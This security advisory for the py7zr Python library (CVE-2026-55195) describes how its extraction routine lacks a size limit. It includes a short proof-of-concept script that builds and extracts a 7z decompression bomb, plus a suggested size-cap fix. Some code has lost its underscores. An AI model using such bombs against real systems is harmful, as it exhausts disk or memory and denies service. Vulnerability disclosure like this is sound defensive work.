PT-2026-51097 · Pypi · Py7Zr
Published
2026-06-19
·
Updated
2026-06-19
·
CVE-2026-55195
CVSS v4.0
6.9
Medium
| Vector | AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N |
py7zr's
Worker.decompress() extracts archive entries without tracking total decompressed size. A crafted .7z file can exhaust disk or memory before the extraction completes.Measured: 15.6 KB archive → 100 MB output (6,556:1 ratio).
Proof of concept:
python
import py7zr, tempfile, os
# create bomb: compress 100MB of zeros into ~15KB
bomb path = tempfile.mktemp(suffix='.7z')
with py7zr.SevenZipFile(bomb path, 'w') as z:
import io
z.writef(io.BytesIO(b'x00' * 100 * 1024 * 1024), 'bomb.bin')
print(f'archive size: {os.path.getsize(bomb path):,} bytes')
# extract — no size check
with py7zr.SevenZipFile(bomb path, 'r') as z:
z.extractall(path=tempfile.mkdtemp())
print('extracted 100 MB from ~15 KB archive')Root cause:
Worker.decompress() in py7zr/worker.py writes decompressed data directly to disk without a running total or configurable size limit. There is no equivalent of Python's zipfile max size parameter.Fix: track cumulative decompressed bytes and raise before writing if a limit is exceeded:
python
MAX EXTRACT SIZE = 2 * 1024 ** 3 # 2 GB default, configurable
total = 0
for chunk in decompressed chunks:
total += len(chunk)
if total > MAX EXTRACT SIZE:
raise py7zr.exceptions.DecompressionBombError(
f'Extraction aborted: decompressed size exceeded {MAX EXTRACT SIZE} bytes'
)
outfile.write(chunk)Tested on py7zr 0.22.0, Python 3.12, Ubuntu 22.04.
Fix
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Py7Zr